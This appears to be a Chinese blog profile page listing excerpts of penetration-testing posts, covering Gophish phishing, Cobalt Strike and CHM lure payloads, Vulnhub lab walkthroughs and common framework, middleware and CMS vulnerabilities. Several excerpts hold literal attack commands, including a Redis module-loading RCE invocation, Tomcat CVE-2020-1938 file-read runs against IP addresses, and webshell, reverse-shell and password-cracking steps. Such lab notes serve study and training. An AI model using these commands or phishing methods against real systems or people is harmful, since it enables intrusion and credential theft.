自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 收藏
  • 关注

原创 gophish钓鱼流程

修改配置文件config,将Listen_url修改为双击gophish.exe在浏览器登录访问钓鱼网站正常,因为还没有配置钓鱼页面。

2025-08-11 19:43:22 535

原创 cs的搭建和使用

5.有效载荷--->Windows可执⾏程序--->选择监听器--->⽣成Generate。

2025-08-11 18:18:43 107

原创 钓鱼鱼饵制作的方式(红队)

1.打开cs,生成payload攻击-web投递2.写一个index.html3.创建一个新的文件夹 里面创建两个文件夹 把上面的index.html加进来5.chm选择工程目录是这个文件夹,然后编译,生成chm。双击chm文件上线cs编译生成CHM双击CMS文件上线cs。

2025-08-11 18:11:11 314

原创 Vulnhub---drippingblues靶场

6.访问https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html。下载respectmydrip.zip,发现被加密。5.访问/dripisreal.txt。8.访问index.php。1.用kali作为攻击机。

2025-08-10 01:10:45 269

原创 Vulnhub---DoubleTrouble靶场

6.使用stegseek对该图片进行解密。5.在kali下载这张图片。1.用kali作为攻击机。这张照片可能是突破口。

2025-08-10 00:17:24 284

原创 Vulnhub----Beelzebub靶场

6.将beelzebub用md5加密一下。krampus和valak,分别试一下。9.在上传页面上传,查看cookie。在靶机上下载47009,提权。5.访问index.php。1.用kali作为攻击机。我们也下载,在攻击机下载。11.连接一下ssh。发现他下载了一个文件。

2025-08-09 18:27:39 210

原创 常⻅框架漏洞

一.Thinkphp(TP)一.Thinkphp(TP)1.用fofa查询放在蓝鲸中扫描。

2025-08-03 14:13:27 617

原创 Vulnhub----Noob靶场

根据上面发现的字符串推测是rot加密,解密一下。登陆用户名weianonymous,密码为空。6.点击About Us会下载一个文件。下载cred.txt和welcome。kaili和靶机都设为NAT模式。1.用kali作为攻击机。9.切换到n00b账户。查看user.txt。

2025-08-03 14:11:39 332

原创 Vulnhub----ELECTRICAL靶场

john 2.txt --wordlist=/usr/share/wordlists/rockyou.txt (由于扫描时间太久,在已知密码的前提下我自己写了一个只包含密码的文件)kaili和靶机都设为NAT模式。5.抓包,爆破获取账号密码。1.用kali作为攻击机。只有8834一个端口能用。没啥用,继续看登录窗口。发现了ssh的用户名。

2025-08-03 02:43:07 200

原创 Vulnhub----Corrosion2靶场

密码是@administrator_hi5。发现了两个可能有用的信息,分别访问。kaili和靶机都设为NAT模式。4.解压backup.zip。1.用kali作为攻击机。发现可以部署war文件。

2025-08-02 23:35:20 412

原创 常⻅中间件漏洞

python "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 8.152.98.193。python "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/flag 8.141.0.63。在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer。3.使⽤以下url绕过登录认证。

2025-07-31 20:24:04 823

原创 常见CMS漏洞

点击扩展功能,幻灯⽚设置,点击保存开启代理进⾏抓包。姿势四:通过后台sql命令执⾏拿webshell。1.点击模板,默认文件管理,index.htm。姿势⼀:通过⽂件管理器上传WebShell。姿势三:后台任意命令执⾏拿WebShell。⼯具,⽂件管理,功能菜单,上传⽂件,解压。姿势⼀:后台修改模板拿WebShell。姿势⼆:修改模板⽂件拿WebShell。1.点击模块,广告管理,增加一个新广告。姿势⼆:上传主题拿WebShell。姿势⼀:通过⽇志⽂件拿Shell。点击模块,文件管理器,上传文件。

2025-07-30 19:22:16 382

原创 Vulnhub----Thales靶场

7.使用哥斯拉生成jsp木马文件,压缩成zip文件。修改压缩包后缀为.war。爆破成功,账号是tomcat,密码是role1。靶机ip为192.168.56.103。点击Manager App,出现登录框。打开靶机,导入VB,设置为仅主机模式。将kali设置为桥接模式。10.使用哥斯拉进行连接。1.kali作为攻击机。9.访问上传的木马文件。4.访问8080端口。5.爆破用户名和密码。发现可部署war文件。11.反弹shell。

2025-07-30 19:10:56 312

原创 Vulnhub----ica1靶场

20.伪造一个文件名为cat的可执行文件,文件内容为/bin/bash,并将文件路径设置为环境变量。在进入靶机前按e,将ro替换为rw init=/bin/bash,再按Ctrl+x进入。15.写一个user.txt和password.txt,将账号和密码写进去。访问192.168.51.129/core/config/发现数据库连接密码在database.yml文件中。18.查看/opt/get_access文件内容。10.下载database.yml文件。19.查看system.info的文件。

2025-07-30 18:23:10 643

原创 Vulnhub----02 - Breakout靶场

5.用枚举工具enum4linux来爆破用户名。.2uqPEfj3D<P'a-3,获取密码。ip为172.16.2.64。1.kali作为攻击机。6.登录20000端口。

2025-07-29 20:40:42 269

原创 Vulnhub----napping-1.0.1靶场

5.在kali里面构造恶意的html界面。6.使用python创建一个http服务。靶机ip为172.16.2.59。1.用kali作为攻击机。输入baidu.com。

2025-07-29 20:13:34 134

原创 Redis getshell

4.在redis-rce目录里面输入python redis-rce.py -r 8152.98.193 -p 6379 -L 192.168.235.138 -f moudle.so。2.进入RedisModules-ExecuteCommand目录输入make。3.生成的redismodule.h复制到redis-rce目录里面。2.监听8888端口。

2025-07-28 20:43:38 112

原创 未授权访问漏洞

⼗三:Springboot Actuator未授权访问漏洞。五:Jupyter NoteBook未授权访问漏洞。六:Elasticsearch未授权访问漏洞。⼗四:FTP未授权访问漏洞(匿名登陆)三:Zookeeper未授权访问漏洞。⼗一:ActiveMQ未授权访问漏洞。⼗二:RabbitMQ未授权访问漏洞。⼆:MongoDB未授权访问漏洞。四:Jenkins未授权访问漏洞。七:Kibana未授权访问漏洞。⼗:Hadoop未授权访问漏洞。⼗五:JBoss未授权访问漏洞。⼗六:Rsync未授权访问漏洞。

2025-07-28 19:40:03 908

原创 Vulnhub----jangow-01-1.0.1靶场

8.访问/site/wordpress/index.html。将ro改为rw signie init=/bin/bash。在启动靶机时长按shift,在此页面按e。访问/site/index.html。1.用kali作为攻击机。2.编辑配置文件网卡信息。9.发现可以上传参数。

2025-07-28 00:45:38 174

原创 Vulnhub----Earth靶场

7.在robots.txt中最后有一个/testingnotes.*;这可能是txt为后缀 访问。再次访问earth.local和terratest.earth.local。密码是earthclimatechangebad4humans。访问https:terratest.earth.local。8.访问testdata.txt,这是XOR密钥。4.发现端口后有两个dns,修改hosts。使用netdiscover查找。6.访问robots.txt。1.用kali作为攻击机。12.反弹shell。

2025-07-27 18:34:55 342

原创 Vulnhub----Web-Machine-N7靶场

查看源码,把localhost换成192.168.121.160。11.将role两次URL解码后再md5解码。12.抓包,将role的值改为admin。1.将Web-Machine-N7导入。最终答案:FLAG{N7KSA_01}8.在enter_network下扫。新扫到一个exploit.html。7.访问enter_network。9.访问admin.php。2.kali作为攻击机。将两个都设为桥接模式。

2025-07-25 02:02:43 317

原创 Vulnhub----matrix-breakout-2-morpheus靶场

发现上传的数据到了graffiti.txt。ip为192.168.235.146。4.使⽤dirb 对⽹⻚进⼀步扫描。有一个graffiti.php文件。5.访问robots.txt文件。使用netdiscover查找。有robots.txt文件。1.用kali作为攻击机。11.用kali监听。

2025-07-25 00:36:13 185

原创 CTFHUB-web进阶-bypass disable_fcuntion通关攻略

1.打开页面2.连接蚁剑3.用工具绕过4.绕过后生成一个.antproxy.php5.连接.antproxy.php6.在虚拟终端中查看答案。

2025-07-24 16:55:32 236

原创 log4j2漏洞攻略

6.拿取JDK1.8并构造Payload且直接访问。2.上传参数并在DNSLog.cn查看。7.用whoami命令查看权限。3.反弹shell并加密。1.启动靶场并进入网站。4.构造PayLoad。5.监听8899端口。

2025-07-23 17:57:03 146

原创 ⽂件解析漏洞

IIS解析漏洞。

2025-07-22 19:12:03 353

原创 tomato靶机通关攻略

在网页端查看ubuntu报错信息:/var/log/auth.log。8.在URL后面输入?6.点击antibots文件夹,再点击info.php。10.向网站写入一句话木马(centos7)靶机ip为192.168.235.144。5.访问antibot_image目录。9.发现端口没有全部扫描出来,再扫一遍。有一个antibot_image目录。4.使⽤dirb 对⽹⻚进⼀步扫描。使用netdiscover查找。1.用kali作为攻击机。发现2211是ssh。

2025-07-21 17:47:50 202

原创 AI-Web-1.0靶场

15.上传一句话木马到/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/发现两个数据库aiweb1、information_schema。14.在kali 创建一个1.php文件 输入一句话木马。7.使⽤dirb 对/se3reTdir777进行扫描。6.使⽤dirb 对/m3diNf0进行扫描。se3reTdir777/uploads/下。靶机ip为192.168.235.143。17.在kali写一个2.php文件。

2025-07-20 21:17:39 579

原创 upload-labs靶场1-20通关攻略

1.打开页面2.写一个一句话木马,改为jpg格式3.上传并抓包将jpg换成php4.运行以下5.成功。

2025-07-20 18:17:38 252

原创 xxe靶场攻略

19.在本机phpstudy的WWW目录下新建一个flag.php文件,将乱码拷贝输入。8.将数据包发送到repeater,构造poc,并引用该实体。4.使用dirsearch工具对网站目录进行扫描。使用netdiscover查找靶机的ip。17.读取/etc/.flag.php。7.读取xxe.php,利用bp抓包。13.访问admin.php并登录。得到/etc/.flag.php。读取flagmeout.php。10.读取admin.php。1.用kali作为攻击机。2.对目标机进行端口扫描。

2025-07-17 20:48:59 177

原创 CTFHub-Web-SSRF通关攻略

1.打开页面2.在url输入http://127.0.0.1/flag.php。

2025-07-17 19:27:04 375

原创 墨家学院通关攻略

1.判断是否存在注入。

2025-07-14 19:23:25 540

原创 SQLI-LABS通关攻略(持续更新)

1.根据提示,将id输入url中2.判断是什么型的注入在url中输入?页面没有发生改变,说明不是数字型注入在url中输入?页面发生改变,说明是字符型注入3.判断数据表的列数在url中输入?id=1' order by (数字)--+一个一个数字试,当页面发生变化时,说明不是输入数字的列数,在输入上一个数字当输入的数字是4时,页面发生变化,说明数据表有3列4.判断数据库名在url输入?数据表列数有3列,所以联合查询3列,页面上出现的还是id=1的数据,这是因为页面只能显示一行数据。

2025-07-09 20:20:48 941

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除